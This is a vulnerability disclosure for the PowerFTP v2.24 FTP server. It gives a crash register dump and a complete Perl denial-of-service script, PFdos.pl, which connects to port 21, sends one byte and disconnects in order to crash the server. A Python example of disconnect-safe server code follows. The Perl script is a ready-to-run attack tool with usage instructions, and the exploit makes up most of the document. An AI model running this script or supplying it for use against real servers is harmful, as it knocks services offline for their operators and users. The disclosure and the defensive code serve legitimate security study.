PowerFTP v2.24 and below remote denial of service exploit in Perl.
hi
The PowerFTPd is available from vendor Cooolsoft's website:
http://www.cooolsoft.com
I found a vulnerability in PowerFTP that allows a remote
user--any user--to shut down the FTP server (tested
on v2.24).
I alerted Cooolsoft (05/10/2002) and I have not had a
response until now.
This attack is due to the bad handling of errors
caused by the disconnection of the remote host. I wrote a
Perl script which launches this attack... and afterwards the
state of the registers is:
Unknown exception - code c0000025 (first chance)
Stack overflow - code c00000fd (first chance)
eax=00033070 ebx=0012ffb4 ecx=0040371c edx=7846f5b5 esi=0003311c edi=00000001
eip=77ea98ca esp=00032d60 ebp=00033050 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
kernel32!UnhandledExceptionFilter+25
and we have this message:
L exeption Exeption logicielle inconnue (0x0eedfade) s'est
produite dans l'application a l'emplacement 0x77e7f142
Exeption EFtpCtrlsocketexeption in module FTPServer.exe at
00059DE6. Data in buffer , cant change size
This was tested against PowerFTP Personal FTP Server v2.24
exploit:
#!/usr/bin/perl -w
##
# tool: PFdos.pl
# author: securma@caramail.com
# purpose: allows a remote user--any user--to shut down the ftp server
# greetz: all friend in marocit and #crack.fr (especially christal)
##
use Socket;
if (not $ARGV[0]) {
print qq~
Usage: pfdos.pl <host>
~;
exit;}
$ip=$ARGV[0];
print "+++++++++++++++++++++++\n\n";
print "PowerFTP DOS \n\n";
print "by securma massine \n\n";
print "securma\@caramail.com \n\n";
print "+++++++++++++++++++++++\n\n";
print "Sending Exploit Code to host: " . $ip . "\n\n";
sendexplt("A");
sub sendexplt {
my ($pstr)=@_;
$target= inet_aton($ip) || die("inet_aton problems");
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,21,$target)){
select(S);
$|=1;
print $pstr;
sleep 3;
close(S);
} else { die("Can't connect...\n"); }
}
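The advisory attributes the crash to error handling when the remote host disconnects. As an added example (not code from the advisory or from PowerFTP), this Python sketch shows a server-side control-channel reader that treats a fragment followed by a disconnect as a normal end of session; `read_command`, `serve_session`, `MAX_LINE` and the sample inputs are assumptions made for illustration.

```python
import socket

MAX_LINE = 512  # assumed cap on one control-channel command line


def read_command(conn, buf, timeout=5.0):
    """Return one complete command (CRLF stripped), or None when the session must end.

    buf is a bytearray holding bytes left over from earlier reads. A fragment
    still in buf when the peer disconnects is discarded, never parsed.
    """
    conn.settimeout(timeout)
    while True:
        end = buf.find(b"\r\n")
        if end > MAX_LINE or (end == -1 and len(buf) > MAX_LINE):
            buf.clear()
            return None  # oversized line: drop it and let the caller close
        if end != -1:
            line = bytes(buf[:end])
            del buf[:end + 2]
            return line
        try:
            chunk = conn.recv(4096)
        except OSError:  # covers timeout, reset and aborted connections
            chunk = b""
        if not chunk:  # peer closed, possibly mid-command
            buf.clear()
            return None
        buf += chunk


def serve_session(conn):
    """Handle one client and return the commands seen; a disconnect ends the loop."""
    buf, seen = bytearray(), []
    try:
        while (line := read_command(conn, buf)) is not None:
            seen.append(line)
    finally:
        conn.close()  # always release the socket, whatever ended the session
    return seen


def demo():
    """Constructed inputs: a lone byte then disconnect, and a command plus a fragment."""
    results = []
    for payload in (b"A", b"USER anonymous\r\nQU"):
        server_side, client_side = socket.socketpair()
        client_side.sendall(payload)
        client_side.close()
        results.append(serve_session(server_side))
    return results


if __name__ == "__main__":
    print(demo())
```
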